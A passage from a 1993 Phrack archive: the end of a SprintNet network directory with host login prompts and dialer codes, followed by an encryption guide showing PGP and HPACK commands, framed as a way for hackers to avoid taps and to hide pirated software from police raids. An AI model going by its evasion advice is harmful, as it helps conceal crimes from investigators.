  8417. EIES       Unix        HP-UX ciathp A.B7.00 U 9000/835
  8418. FAR                    Please enter your ID number: 
  8419. FED                    REJECTING 00 E8
  8420. GOLD     $
  8421. GTEMAIL                SprintNet Directory           
  8422. INFO                   Your call cannot be completed (unknown destination).
  8423. IRIS                   NOT REACHABLE 05 E6
  8424. ITI        VAX/VMS     Usuario :
  8425. KIS                    ACCESS TO THIS ADDRESS NOT PERMITTED.
  8426. LEXIS                  Lexis and Nexis
  8427. MAIL                   SprintNet Directory
  8428. META       Unix        tmn!login:
  8429. MMM                    USER ID   
  8430. MUNI                   ACCESS TO THIS ADDRESS NOT PERMITTED.
  8431. NAS                    PLEASE ENTER  LOGIN
  8432. NASA 
  8433. NET        Prime       NewsNet
  8434. NETX       SNPBBS      Telenet's NETXBBS (Old PCP/New Buisnesscall bbs?)
  8435. NLM                    PLEASE ENTER  LOGIN
  8436. NSF                    ACCESS TO THIS ADDRESS NOT PERMITTED.
  8437. OAG                    PLEASE ENTER SUBSCRIBERID;PASSWORD
  8438. OLS                    NOT OPERATING 09 00
  8439. ONLINE     VOS         Please login
  8440. ORBIT                  ENTER ORBIT USERID
  8441. PDN        Major BBS   Public Data Network (BBS)  User-ID? new
  8442. PLASPEC    Unix
  8443. PLAY     $ 
  8444. PORTAL                 Portal Communications Company.
  8445. PSINET   $
  8446. PURSUIT    SNPBBS      PC-Pursuit BBS                
  8447. QUICK                  PLEASE ENTER YOUR BMG USERID  : 
  8448. SIS        NOS         CDCNET 
  8449. SPR                    REMOTE PROCEDURE ERROR 11 51
  8450. STK1                   ACCESS TO THIS ADDRESS NOT PERMITTED.
  8451. STK2                   ACCESS TO THIS ADDRESS NOT PERMITTED.
  8452. STK3                   ACCESS TO THIS ADDRESS NOT PERMITTED.
  8453. TELEX                  User name? 
  8454. TELEMAIL               User name?
  8455. TPE      $ Major BBS   (adult chat/bbs)  Member-ID? new
  8456. TRACK    $
  8457. TRW                    User name?
  8458. UNISYS                 ACCESS TO THIS ADDRESS NOT PERMITTED.
  8459. USIBM                  
  8460. VONS                   USER ID 
  8461. VUTEXT                 VU/TEXT 
  8462. WARNER                 ACCESS TO THIS ADDRESS NOT PERMITTED.
  8463. WESTLAW                ENTER ID
  8464. ZIFF                   **** Invalid sign-on, please try again ****
  8465.  
  8466.  
  8467.  
  8468. PC-Pursuit Dialers
  8469. ~~~~~~~~~~~~~~~~~~
  8470. Usage:  C D/<dialer>/<baud>,<nui>,<password>  (Note:  bauds are 3, 12, or 24)
  8471.  
  8472. NPA  Dialer
  8473. ~~  ~~~~~~
  8474. 313  MIAAR
  8475. 404  GAATL
  8476. 512  TXAUS
  8477. 617  MABOS
  8478. 312  ILCHI
  8479. 708  ILCHI (1-708+num)
  8480. 815  ILCHI (1-815+num)
  8481. 216  OHCLE
  8482. 714  CACOL
  8483. 614  OHCOL
  8484. 214  TXDAL
  8485. 817  TXDAL (817+num)
  8486. 303  CODEN
  8487. 313  MIDET
  8488. 818  CAGLE
  8489. 310  CAGLE (1-310+num)
  8490. 213  CAGLE (1-213+num)
  8491. 203  CTHAR
  8492. 516  NYHEM
  8493. 713  TXHOU
  8494. 317  ININ12
  8495. 317  ININ24
  8496. 816  MOKCI
  8497. 913  MOKCI
  8498. 213  CALAN
  8499. 310  CALAN (1-310+num)
  8500. 818  CALAN (1-818+num)
  8501. 305  FLMIA
  8502. 414  WIMIL
  8503. 612  MNMIN
  8504. 201  NJNEW
  8505. 908  NJNEW (1-908+num)
  8506. 901  TNMEM
  8507. 601  TNMEM (1-601+num)
  8508. 908  NJNBR
  8509. 201  NJNBR (1-201+num)
  8510. 504  LANOR 
  8511. 212  NYNYO
  8512. 516  NYNYO (1-516+num)
  8513. 718  NYNYO (1-718+num)
  8514. 914  NYNYO (1-914+num)
  8515. 415  CAOAK (1-415+num)
  8516. 510  CAOAK
  8517. 407  FLORL
  8518. 415  CAPAL
  8519. 408  CAPAL (1-408+num)
  8520. 510  CAPAL (1-510+num)
  8521. 215  PAPHI
  8522. 602  AZPHO
  8523. 412  PAPIT
  8524. 503  ORPOR
  8525. 919  NCRTP
  8526. 916  CASAC
  8527. 801  UTSLC
  8528. 619  CASDI
  8529. 415  CASFA
  8530. 510  CASFA (1-510+num)
  8531. 408  CASJO
  8532. 510  CASJO (1-510+num)
  8533. 415  CASJO (1-415+num)
  8534. 714  CASAN
  8535. 310  CASAN (1-310+num)
  8536. 213  CASAN (1-213+num)
  8537. 206  WASEA
  8538. 314  MOSLO
  8539. 618  MOSLO (1-618+num)
  8540. 813  FLTAM
  8541. 202  DCWAS
  8542. 703  DCWAS (1-703+num)
  8543. 301  DCWAS (1-301+num)
  8544.  
  8545.  
  8546.  
  8547.   ************************End SprintNet Directory 92**************************
  8548.  
  8549.                                                                          -Sky
  8550.  
  8551.  
  8552.  
  8553.  
  8554. Date:     Wed Mar 24, 1993 11:42 am  PST
  8555. From:     phrack
  8556.           EMS: INTERNET / MCI ID: 376-5414
  8557.           MBX: phrack@stormking.com
  8558.  
  8559. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  8560. TO:       Proctor & Associates / MCI ID: 399-1080
  8561. TO:       Peter Nesbitt / MCI ID: 511-1312
  8562. TO:     * Berton Corson / MCI ID: 528-0397
  8563. TO:       Michael W. Carroll / MCI ID: 557-1860
  8564. TO:       Michael McMahon / MCI ID: 585-7625
  8565. TO:       Multiple recipients of list
  8566.           EMS: INTERNET / MCI ID: 376-5414
  8567.           MBX: phrack@stormking.com
  8568. Subject:  Phrack 42/11-14
  8569.  
  8570.                               ==Phrack Magazine==
  8571.  
  8572.                  Volume Four, Issue Forty-Two, File 11 of 14
  8573.  
  8574.  
  8575.               ###################################################
  8576.               # The Paranoid Schizophrenics Guide to Encryption #
  8577.               #   (or How to Avoid Getting Tapped and Raided)   #
  8578.               ###################################################
  8579.  
  8580.                         Written by The Racketeer of
  8581.                             The /-/ellfire Club
  8582.  
  8583.  
  8584.         The purpose of this file is to explain the why and the how of Data
  8585. Encryption, with a brief description of the future of computer security,
  8586. TEMPEST.
  8587.  
  8588.         At the time of this issue's release, two of the more modern software
  8589. packages use encryption methods covered in this article, so exercise some of
  8590. your neurons and check into newer releases if they are available.  Methods
  8591. described in this file use PGP, covering an implementation of Phil Zimmermann's
  8592. RSA variant, and the MDC and IDEA conventional encryption techniques by using
  8593. PGP and HPACK.
  8594.  
  8595.                               --------------------
  8596.                               WHY DATA ENCRYPTION?
  8597.                               --------------------
  8598.  
  8599.         This isn't exactly the typical topic discussed by me in Phrack.
  8600. However, the importance of knowing encryption is necessary when dealing with
  8601. any quasi-legal computer activity.  I was planning on starting my series on
  8602. hacking Novell Networks (so non-Internet users can have something to do), but
  8603. recent events have caused me to change my mind and, instead of showing people
  8604. how to get into more trouble (well, okay, there is plenty of that in this file
  8605. too, since you're going to be working with contraband software), I've opted
  8606. instead to show people how to protect themselves from the long arm of the Law.
  8607.  
  8608.         Why all this concern?
  8609.  
  8610.         Relatively recently, The Masters of Deception (MoD) were raided by
  8611. various federal agencies and were accused of several crimes.  The crimes they
  8612. did commit will doubtlessly cause more mandates, making the already
  8613. too-outrageous penalties even worse.
  8614.  
  8615.         "So?" you might ask.  The MoD weren't exactly friends of mine.  In fact,
  8616. quite the contrary.  But unlike many of the hackers whom I dealt with in the
  8617. "final days" prior to their arrest, I bitterly protested any action against the
  8618. MoD.  Admittedly, I followed the episode from the beginning to the end, and the
  8619. moral arguments were enough to rip the "Hacker World" to pieces.  But these
  8620. moral issues are done, the past behind most of us.  It is now time to examine
  8621. the aftermath of the bust.
  8622.  
  8623.         According to the officials in charge of the investigation against MoD
  8624. members, telephone taps were used to gain evidence against members
  8625. successfully.  All data going in and out of their house was monitored and all
  8626. voice communications were monitored, especially between members.
  8627.  
  8628.         So, how do you make a line secure?  The party line answer is use of
  8629. effective encryption methods.
  8630.  
  8631.         Federal investigative agencies are currently pushing for more
  8632. technological research into the issue of computer security.  All of the popular
  8633. techniques which are being used by hackers today are being used by the
  8634. government's R&D departments.
  8635.  
  8636.         Over the course of the last 5 years, I've watched as the U.S.
  8637. Government went from a task force of nearly nil all the way to a powerful
  8638. marauder.  Their mission?  Unclear.  Regardless, the research being
  8639. accomplished by federally-funded projects dealing with the issues of computer
  8640. security are escalating.  I've personally joined and examined many such
  8641. conferences and have carefully examined the issues.  Many of these issues will
  8642. become future Phrack articles which I'll write.  Others, such as limited-life
  8643. semiconductors and deliberate telephone line noise sabotage caused by ACK
  8644. packet detections in order to drive telecommunication costs higher, are sadly
  8645. unpreventable problems of the future which won't be cured by simple awareness
  8646. of the problem.
  8647.  
  8648.         They have different names -- Computer Emergency Response Team (CERT),
  8649. Computer Assisted Security Investigative Analysis Tool (FBI's CASIAT), the
  8650. Secret Service's Computer Fraud Division, or the National Computer Security
  8651. Center (NSA's NCSC).  Scores of other groups exist for every network, even
  8652. every operating system.  Their goal isn't necessarily to catch hackers; their
  8653. goal is to acquire information about the act of hacking itself until it is no
  8654. longer is a problem.  Encryption stands in the way.
  8655.  
  8656.         Computer Security is literally so VAST a concept that, once a person
  8657. awakens to low-level computer mechanics, it becomes nearly impossible to
  8658. prevent that person from gaining unauthorized access to machines.  This is
  8659. somewhat contradictory to the "it's all social engineering" concept which we
  8660. have been hearing about on Nightline and in the papers.  If you can't snag them
  8661. one way though, you can get them another -- the fact is that computers are
  8662. still too damn vulnerable these days to traditional hacking techniques.
  8663.  
  8664.         Because of the ease of breaking through security, it becomes very
  8665. difficult to actually create an effective way to protect yourself from any form
  8666. of computer hacking.  Look at piracy:  they've tried every trick in the book to
  8667. protect software and, so far, the only success they have had was writing
  8668. software that sucked so much nobody wanted a copy.
  8669.  
  8670.         Furthermore, totally non-CPU related attacks are taking place.  The
  8671. passing of Anti-TEMPEST Protection Laws which prevent homes from owning
  8672. computers that don't give off RF emissions has made it possible for any Joe
  8673. with a few semesters of electrical engineering knowledge to rig together a
  8674. device that can read what's on your computer monitor.
  8675.  
  8676.      Therefore:
  8677.  
  8678.      Q:  How does a person protect their own computer from getting hacked?
  8679.  
  8680.      A:  You pretty much can't.
  8681.  
  8682.         I've memorized so many ways to bypass computer security that I can
  8683. rattle them off in pyramid levels.  If a computer is not even connected to a
  8684. network or phone line, people can watch every keystroke typed and everything
  8685. displayed on the screen.
  8686.  
  8687.         Why aren't the Fedz using these techniques RIGHT NOW?
  8688.  
  8689.         I can't say they are not.  However, a little research into TEMPEST
  8690. technology resulted in a pretty blunt fact:
  8691.  
  8692.         There are too many computer components to scan accurately.  Not the
  8693. monitor, oh no!  You're pretty much fucked there.  But accessories for input
  8694. and output, such as printers, sound cards, scanners, disk drives, and so
  8695. forth...the possibility of parallel CPU TEMPEST technology exists, but there are
  8696. more CPU types than any mobile unit could possibly use accurately.
  8697.  
  8698.         Keyboards are currently manufactured by IBM, Compaq, Dell, Northgate,
  8699. Mitsuma (bleah), Fujitsu, Gateway, Focus, Chichony, Omni, Tandy, Apple, Sun,
  8700. Packard-Bell (may they rot in hell), Next, Prime, Digital, Unisys, Sony,
  8701. Hewlett-Packard, AT&T, and a scattering of hundreds of lesser companies.  Each
  8702. of these keyboards have custom models, programmable models, 100+ key and < 100
  8703. key models, different connectors, different interpreters, and different levels
  8704. of cable shielding.
  8705.  
  8706.         For the IBM compatible alone, patents are owned on multiple keyboard
  8707. pin connectors, such as those for OS/2 and Tandy, as well as the fact that the
  8708. ISA chipsets are nearly as diverse as the hundreds of manufacturers of
  8709. motherboards.  Because of lowest-bid practices, there can be no certainty of
  8710. any particular connection -- especially when you are trying to monitor a
  8711. computer you've never actually seen!
  8712.  
  8713.         In short -- it costs too much for the TEMPEST device to be mobile and
  8714. to be able to detect keystrokes from a "standard" keyboard, mostly because
  8715. keyboards aren't "standard" enough!  In fact, the only real standard which I
  8716. can tell exists on regular computers is the fact that monitors still use good
  8717. old CRT technology.
  8718.  
  8719.         Arguments against this include the fact that most of the available PC
  8720. computers use standard DIN connectors which means that MOST of the keyboards
  8721. could be examined.  Furthermore, these keyboards are traditionally serial
  8722. connections using highly vulnerable wire (see Appendix B).
  8723.  
  8724.         Once again, I raise the defense that keyboard cables are traditionally
  8725. the most heavily shielded (mine is nearly 1/4 inch thick) and therefore falls
  8726. back on the question of how accurate a TEMPEST device which is portable can be,
  8727. and if it is cost effective enough to use against hackers.  Further viewpoints
  8728. and TEMPEST overview can be seen in Appendix B.
  8729.  
  8730.         As a result, we have opened up the possibility for protection from
  8731. outside interference for our computer systems.  Because any DECENT encryption
  8732. program doesn't echo the password to your screen, a typical encryption program
  8733. could provide reasonable security to your machine.  How reasonable?
  8734.  
  8735.         If you have 9 pirated programs installed on your computer at a given
  8736. time and you were raided by some law enforcement holes, you would not be
  8737. labeled at a felon.  Instead, it wouldn't even be worth their time to even raid
  8738. you.  If you have 9 pirated programs installed on your computer, had 200
  8739. pirated programs encrypted in a disk box, and you were raided, you would have
  8740. to be charged with possession of 9 pirated programs (unless you did something
  8741. stupid, like write "Pirated Ultima" or something on the label).
  8742.  
  8743.         We all suspected encryption was the right thing to do, but what about
  8744. encryption itself?  How secure IS encryption?
  8745.  
  8746.         If you think that the world of the Hackers is deeply shrouded with
  8747. extreme prejudice, I bet you can't wait to talk with crypto-analysts.  These
  8748. people are traditionally the biggest bunch of holes I've ever laid eyes on.  In
  8749. their mind, people have been debating the concepts of encryption since the dawn
  8750. of time, and if you come up with a totally new method of data encryption, -YOU
  8751. ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying "Oh, I
  8752. just came up with this idea for an encryption which might be the best one yet"
  8753. when people have dedicated all their lives to designing and breaking encryption
  8754. techniques -- so what makes you think you're so fucking bright?
  8755.  
  8756.         Anyway, crypto-(anal)ysts tend to take most comments as veiled insults,
  8757. and are easily terribly offended.  Well, make no mistake, if I wanted to insult
  8758. these people, I'd do it.  I've already done it.  I'll continue to do it.  And I
  8759. won't thinly veil it with good manners, either.
  8760.  
  8761.         The field of Crypto-analysis has traditionally had a mathematical
  8762. emphasis.  The Beal Cipher and the German Enigma Cipher are some of the more
  8763. popular views of the field.  Ever since World War 2, people have spent time
  8764. researching how technology was going to affect the future of data encryption.
  8765.  
  8766.         If the United States went to war with some other country, they'd have a
  8767. strong advantage if they knew the orders of the opposing side before they were
  8768. carried out.  Using spies and wire taps, they can gain encrypted data referred
  8769. to as Ciphertext.  They hand the information over to groups that deal with
  8770. encryption such as the NSA and the CIA, and they attempt to decode the
  8771. information before the encrypted information is too old to be of any use.
  8772.  
  8773.         The future of Computer Criminology rests in the same ways.  The
  8774. deadline on white collar crimes is defaulted to about 3-4 years, which is
  8775. called the Statute of Limitations.  Once a file is obtained which is encrypted,
  8776. it becomes a task to decrypt it within the statute's time.
  8777.  
  8778.         As most crypto-analysts would agree, the cost in man-hours as well as
  8779. supercomputer time would make it unfeasible to enforce brute force decryption
  8780. techniques of random encryption methods.  As a result of this, government
  8781. regulation stepped in.
  8782.  
  8783.         The National Security Agency (referred to as "Spooks" by the relatively
  8784. famous tormenter of KGB-paid-off hackers, Cliff Stoll, which is probably the
  8785. only thing he's ever said which makes me think he could be a real human being)
  8786. released the DES -- Data Encryption Standard.  This encryption method was
  8787. basically solid and took a long time to crack, which was also the Catch-22.
  8788.  
  8789.         DES wasn't uncrackable, it was just that it took "an unreasonable
  8790. length of time to crack."  The attack against the word "unreasonable" keeps
  8791. getting stronger and stronger.  While DES originated on Honeywell and DEC PDPs,
  8792. it was rumored that they'd networked enough computers together to break a
  8793. typical DES encrypted file.  Now that we have better computers and the cost
  8794. requirements for high-speed workstations are even less, I believe that even if
  8795. they overestimated "unreasonable" a hundredfold, they'd be in the "reasonable"
  8796. levels now.
  8797.  
  8798. To explain how fast DES runs these days...
  8799.  
  8800.         I personally wrote a password cracker for DES which was arguably the
  8801. very first true high-speed cracker.  It used the German "Ultra-Fast Crypt"
  8802. version of the DES algorithm, which happened to contain a static variable used
  8803. to hold part of the previous attempt at encrypting the password, called the
  8804. salt.  By making sure the system wouldn't resalt on every password attempt, I
  8805. was able to guess passwords out of a dictionary at the rate of 400+ words per
  8806. second on a 386-25 (other methods at that time were going at about 30 per
  8807. second).  As I understand it now, levels at 500+ for the same CPU have been
  8808. achieved.
  8809.  
  8810.         Now this means I can go through an entire dictionary in about five
  8811. minutes on a DES-encrypted segment.  The NSA has REAL cash and some of the
  8812. finest mathematicians in the world, so if they wanted to gain some really
  8813. decent speed on encryption, DES fits the ideal for parallel programming.
  8814. Splitting a DES segment across a hundred CPUs, each relatively modern, they
  8815. could crank out terraflops of speed.  They'd probably be able to crack the code
  8816. within a few days if they wanted to.
  8817.  
  8818.         Ten years from now, they could do it in a few seconds.
  8819.  
  8820.         Of course, the proper way to circumnavigate DES encryption is to locate
  8821. and discover a more reliable, less popular method.  Because the U.S. Government
  8822. regulates it, it doesn't mean it's the best.  In fact, it means it's the
  8823. fucking lamest thing they could sweeten up and hope the public swallows it!
  8824. The last attempt the NSA made at regulating a standard dealing with encryption,
  8825. they got roasted.
  8826.  
  8827.         I'm somewhat convinced that the NSA is against personal security, and
  8828. from all the press they give, they don't WANT anyone to have personal security.
  8829. Neither does the Media for that matter.
  8830.  
  8831.         Because of lamers in the "Biblical Injustice Grievance Group of
  8832. Opposing Terrible Sacrilege" (or BIGGOTS) who think that if you violate a LAW
  8833. you're going to Hell (see APPENDIX C for my viewpoint of these people) and who
  8834. will have convinced Congress to pass ease-of-use wire taps on telephone lines
  8835. and networks so that they can monitor casual connections without search
  8836. warrants, encryption will be mandatory if you want any privacy at all.
  8837.  
  8838.         And to quote Phil Zimmermann, "If privacy is outlawed, only the
  8839. outlaws will have privacy."
  8840.  
  8841.         Therefore, encryption methods that we must use should be gathered into
  8842. very solid categories which do NOT have endorsement of the NSA and also have
  8843. usefulness in technique.
  8844.  
  8845. HOW TO USE DECENT ENCRYPTION:
  8846.  
  8847. (First, go to APPENDIX D, and get yourself a copy of PGP, latest version.)
  8848.  
  8849.         First of all, PGP is contraband software, presumably illegal to use in
  8850. the United States because of a patent infringement it allegedly carries.  The
  8851. patent infringement is the usage of a variant of the RSA encryption algorithm.
  8852. Can you patent an algorithm?  By definition, you cannot patent an idea, just a
  8853. product -- like source code.  Yet, the patent exists to be true until proven
  8854. false.  More examples of how people in the crypto-analyst field can be assholes.
  8855.  
  8856.         Anyway, Phil's Pretty Good Software, creators of PGP, were sued and all
  8857. rights to PGP were forfeited in the United States of America.  Here comes the
  8858. violation of the SECOND law, illegal exportation of a data encryption outside
  8859. of the United States of America.  Phil distributed his encryption techniques
  8860. outside the USA, which is against the law as well.  Even though Mr. Zimmermann
  8861. doesn't do any work with PGP, because he freely gave his source code to others,
  8862. people in countries besides the United States are constantly updating and
  8863. improving the PGP package.
  8864.  
  8865.         PGP handles two very important methods of encryption -- conventional
  8866. and public key.  These are both very important to understand because they
  8867. protect against completely different things.
  8868.  
  8869.                             -----------------------
  8870.                             CONVENTIONAL ENCRYPTION
  8871.                             -----------------------
  8872.  
  8873.         Conventional encryption techniques are easiest to understand.  You
  8874. supply a password and the password you enter encrypts a file or some other sort
  8875. of data.  By re-entering the password, it allows you to recreate the original
  8876. data.
  8877.  
  8878.         Simple enough concept, just don't give the password to someone you
  8879. don't trust.  If you give the password to the wrong person, your whole business
  8880. is in jeopardy.  Of course, that goes with just about anything you consider
  8881. important.
  8882.  
  8883.         There are doubtlessly many "secure enough" ciphers which exist right
  8884. now.  Unfortunately, the availability of these methods are somewhat slim
  8885. because of exportation laws.  The "major" encryption programs which I believe
  8886. are worth talking about here are maintained by people foreign to the USA.
  8887.  
  8888.         The two methods of "conventional" encryption are at least not DES,
  8889. which qualifies them as okay in my book.  This doesn't mean they are impossible
  8890. to break, but they don't have certain DES limitations which I know exist, such
  8891. as 8 character password maximum.  The methods are:  MDC, as available in the
  8892. package HPACK; and IDEA, as available in Pretty Good Privacy.
  8893.  
  8894.         Once you've installed PGP, we can start by practicing encrypting
  8895. some typical files on your PC.  To conventionally encrypt your AUTOEXEC.BAT
  8896. file (it won't delete the file after encryption), use the following command:
  8897.  
  8898. C:\> pgp -c autoexec.bat
  8899. Pretty Good Privacy 2.1 - Public-key encryption for the masses.
  8900. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  8901. Date: 1993/01/19 03:06 GMT
  8902.  
  8903. You need a pass phrase to encrypt the file.
  8904. Enter pass phrase:                                      { Password not echoed }
  8905. Enter same pass phrase again: Just a moment....
  8906. Ciphertext file: autoexec.pgp
  8907.  
  8908. C:\> dir
  8909.  
  8910.  Volume in drive C is RACK'S
  8911.  Directory of  c:\autoexec.pgp
  8912.  
  8913. autoexec.pgp      330 1-18-93  21:05
  8914.  
  8915.         330 bytes in 1 file(s)          8,192 bytes allocated
  8916.   52,57,104 bytes free
  8917.  
  8918.         PGP will compress the file before encrypting it.  I'd say this is a
  8919. vulnerability to the encryption on the basis that the file contains a ZIP file
  8920. signature which could conceivably make the overall encryption less secure.
  8921. Although no reports have been made of someone breaking PGP this way, I'd feel
  8922. more comfortable with the ZIP features turned off.  This is somewhat contrary
  8923. to the fact that redundancy checking is another way of breaking ciphertext.
  8924. However, it isn't as reliable as checking a ZIP signature.
  8925.  
  8926.         Although PGP will doubtlessly become the more popular of the two
  8927. programs, HPACK's encryption "strength" is that by being less popular, it will
  8928. probably not be as heavily researched as PGP's methods will be.  Of course, by
  8929. following PGP, new methods of encryption will doubtlessly be added as the
  8930. program is improved.
  8931.  
  8932.         Here is how you'd go about encrypting an entire file using the HPACK
  8933. program using the MDC "conventional" encryption:
  8934.  
  8935. C:\> hpack A -C secret.hpk secret.txt
  8936. HPACK - The multi-system archiver Version 0.78a0 (shareware version)
  8937. For Amiga, Archimedes, Macintosh, MSDOS, OS/2, and UNIX
  8938. Copyright (c) Peter Gutmann 1989 - 1992.  Release date: 1 Sept 1992
  8939.  
  8940. Archive is 'SECRET.HPK'
  8941.  
  8942. Please enter password (8..80 characters):
  8943. Reenter password to confirm:
  8944. Adding SECRET  .TXT
  8945.  
  8946. Done
  8947.  
  8948.         Anyway, I don't personally think HPACK will ever become truly popular
  8949. for any reason besides its encryption capabilities.  ZIP has been ported to an
  8950. amazing number of platforms, in which lies ZIP's encryption weakness.  If you
  8951. think ZIP is safe, remember that you need to prevent the possibility of four
  8952. years of attempted password cracking in order to beat the Statutes of
  8953. Limitations:
  8954.  
  8955.         Here is the introduction to ZIPCRACK, and what it had to say about how
  8956. easy it is to break through this barrier:
  8957.  
  8958. (Taken from ZIPCRACK.DOC)
  8959. -----
  8960.      ZIPCRACK is a program designed to demonstrate how easy it is to find
  8961. passwords on files created with PKZIP.  The approach used is a fast,
  8962. brute-force attack, capable of scanning thousands of passwords per second
  8963. (5-6000 on an 80386-33).  While there is currently no known way to decrypt
  8964. PKZIP's files without first locating the correct password, the probability that
  8965. a particular ZIP's password can be found in a billion-word search (which takes
  8966. about a day on a fast '486) is high enough that anyone using the encryption
  8967. included in PKZIP 1.10 should be cautious (note:  as of this writing, PKZIP
  8968. version 2.00 has not been released, so it is not yet known whether future
  8969. versions of PKZIP will use an improved encryption algorithm).  The author's
  8970. primary purpose in releasing this program is to encourage improvements in ZIP
  8971. security.  The intended goal is NOT to make it easy for every computer user to
  8972. break into any ZIP, so no effort has been made to make the program
  8973. user-friendly.
  8974. ----- End Blurb
  8975.  
  8976.         Likewise, WordPerfect is even more vulnerable.  I've caught a copy of
  8977. WordPerfect Crack out on the Internet and here is what it has to say about
  8978. WordPerfect's impossible-to-break methods:
  8979.  
  8980. (Taken from WPCRACK.DOC:)
  8981. -----
  8982. WordPerfect's manual claims that "You can protect or lock your documents with a
  8983. password so that no one will be able to retrieve or print the file without
  8984. knowing the password - not even you," and "If you forget the password, there is
  8985. absolutely no way to retrieve the document."  [1]
  8986.  
  8987. Pretty impressive!  Actually, you could crack the password of a Word Perfect
  8988. 5.x file on a 8 1/2" x 11" sheet of paper, it's so simple.  If you are counting
  8989. on your files being safe, they are NOT.  Bennet [2] originally discovered how
  8990. the file was encrypted, and Bergen and Caelli [3] determined further
  8991. information regarding version 5.x.  I have taken these papers, extended them,
  8992. and written some programs to extract the password from the file.
  8993. ----- End Blurb
  8994.  
  8995.                              ---------------------
  8996.                              PUBLIC KEY ENCRYPTION
  8997.                              ---------------------
  8998.  
  8999.         Back to the Masters of Deception analogy -- they were telephone
  9000. tapped.  Conventional encryption is good for home use, because only one person
  9001. could possibly know the password.  But what happens when you want to transmit
  9002. the encrypted data by telephone?  If the Secret Service is listening in on your
  9003. phone calls, you can't tell the password to the person that you want to send
  9004. the encrypted information to.  The SS will grab the password every single time.
  9005.  
  9006.         Enter Public-Key encryption!   The concepts behind Public-Key are very
  9007. in-depth compared to conventional encryption.  The idea here is that passwords
  9008. are not exchanged; instead a "key" which tells HOW to encrypt the file for the
  9009. other person is given to them.  This is called the Public Key.
  9010.  
  9011.         You retain the PRIVATE key and the PASSWORD.  They tell you how to
  9012. decrypt the file that someone sent you.  There is no "straight" path between
  9013. the Public Key and the Private Key, so just because someone HAS the public key,
  9014. it doesn't mean they can produce either your Secret Key or Password.  All it
  9015. means is that if they encrypt the file using the Public Key, you will be able
  9016. to decrypt it.  Furthermore, because of one-way encryption methods, the output
  9017. your Public Key produces is original each time, and therefore, you can't
  9018. decrypt the information you encrypted with the Public Key -- even if you
  9019. encrypted it yourself!
  9020.  
  9021.         Therefore, you can freely give out your own Public Key to anyone you
  9022. want, and any information you receive, tapped or not, won't make a difference.
  9023. As a result, you can trade anything you want and not worry about telephone
  9024. taps!  This technique supposedly is being used to defend the United States'
  9025. Nuclear Arsenal, if you disbelieve this is secure.
  9026.  
  9027.         I've actually talked with some of the makers of the RSA "Public-Key"
  9028. algorithm, and, albeit they are quite brilliant individuals, I'm somewhat
  9029. miffed at their lack of enthusiasm for aiding the public in getting a hold of
  9030. tools to use Public Key.  As a result, they are about to get railroaded by
  9031. people choosing to use PGP in preference to squat.
  9032.  
  9033.         Okay, maybe they don't have "squat" available.  In fact, they have a
  9034. totally free package with source code available to the USA public (no
  9035. exportation of code) which people can use called RSAREF.  Appendix E explains
  9036. more about why I'm not suggesting you use this package, and also how to obtain
  9037. it so you can see for yourself.
  9038.  
  9039.         Now that we know the basic concepts of Public-Key, let's go ahead and
  9040. create the basics for effective tap-proof communications.
  9041.  
  9042. Generation of your own secret key (comments in {}s):
  9043.  
  9044. C:\> pgp -kg               {  Command used to activate PGP for key generation }
  9045. Pretty Good Privacy 2.1 - Public-key encryption for the masses.
  9046. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  9047. Date: 1993/01/18 19:53 GMT
  9048.  
  9049. Pick your RSA key size:
  9050.         1)       384 bits- Casual grade, fast but less secure
  9051.         2)       512 bits- Commercial grade, medium speed, good security
  9052.         3)      1024 bits- Military grade, very slow, highest security
  9053. Choose 1, 2, or 3, or enter desired number of bits: 3  {DAMN STRAIGHT MILITARY}
  9054.  
  9055. Generating an RSA key with a 1024-bit modulus...
  9056. You need a user ID for your public key.  The desired form for this
  9057. user ID is your name, followed by your E-mail address enclosed in
  9058. <angle brackets>, if you have an E-mail address.
  9059. For example:  John Q. Smith <12345.6789@compuserve.com>
  9060.  
  9061. Enter a user ID for your public key:
  9062. The Racketeer <rack@lycaeum.hfc.com>
  9063.  
  9064. You need a pass phrase to protect your RSA secret key.
  9065. Your pass phrase can be any sentence or phrase and may have many
  9066. words, spaces, punctuation, or any other printable characters.
  9067. Enter pass phrase:                                     { Not echoed to screen }
  9068. Enter same pass phrase again:                          {  "    "    "    "    }
  9069. Note that key generation is a VERY lengthy process.
  9070.  
  9071. We need to generate 105 random bytes.  This is done by measuring the
  9072. time intervals between your keystrokes.  Please enter some text on your
  9073. keyboard, at least 210 nonrepeating keystrokes, until you hear the beep:
  9074. 1 .*                                                             { decrements }
  9075. -Enough, thank you.
  9076. ..................................................++++ ........++++
  9077. Key generation completed.
  9078.  
  9079.         It took a 33-386DX a grand total of about 10 minutes to make the key.
  9080. Now that it has been generated, it has been placed in your key ring.  We can
  9081. examine the key ring using the following command:
  9082.  
  9083. C:\> pgp -kv
  9084. Pretty Good Privacy 2.1 - Public-key encryption for the masses.
  9085. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  9086. Date: 1993/01/18 20:19 GMT
  9087.  
  9088. Key ring: 'c:\pgp\pubring.pgp'
  9089. Type bits/keyID   Date       User ID
  9090. pub  1024/7C8C3D  1993/01/18 The Racketeer <rack@lycaeum.hfc.com>
  9091. 1 key(s) examined.
  9092.  
  9093.         We've now got a viable keyring with your own keys.  Now, you need to
  9094. extract your Public Key so that you can have other people encrypt shit and have
  9095. it sent to you.  In order to do this, you need to be able to mail it to them.
  9096. Therefore, you need to extract it in ASCII format.  This is done by the
  9097. following:
  9098.  
  9099. C:\> pgp -kxa "The Racketeer <rack@lycaeum.hfc.com>"
  9100. Pretty Good Privacy 2.1 - Public-key encryption for the masses
  9101. (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
  9102. Date: 1993/01/18 20:56 GMT
  9103.  
  9104. Extracting from key ring:  'c:\pgp\pubring.pgp', userid "The Racketeer
  9105. <rack@lycaeum.hfc.com>".
  9106.  
  9107. Key for user ID: The Racketeer <rack@lycaeum.hfc.com>
  9108. 1024-bit key, Key ID 0C975F, created 1993/01/18
  9109.  
  9110. Extract the above key into which file? rackkey
  9111.  
  9112. Transport armor file: rackkey.asc
  9113.  
  9114. Key extracted to file 'rackkey.asc'.
  9115.  
  9116.         Done.  The end result of the key is a file which contains:
  9117.  
  9118. -----BEGIN PGP PUBLIC KEY BLOCK-----
  9119. Version: 2.1
  9120.  
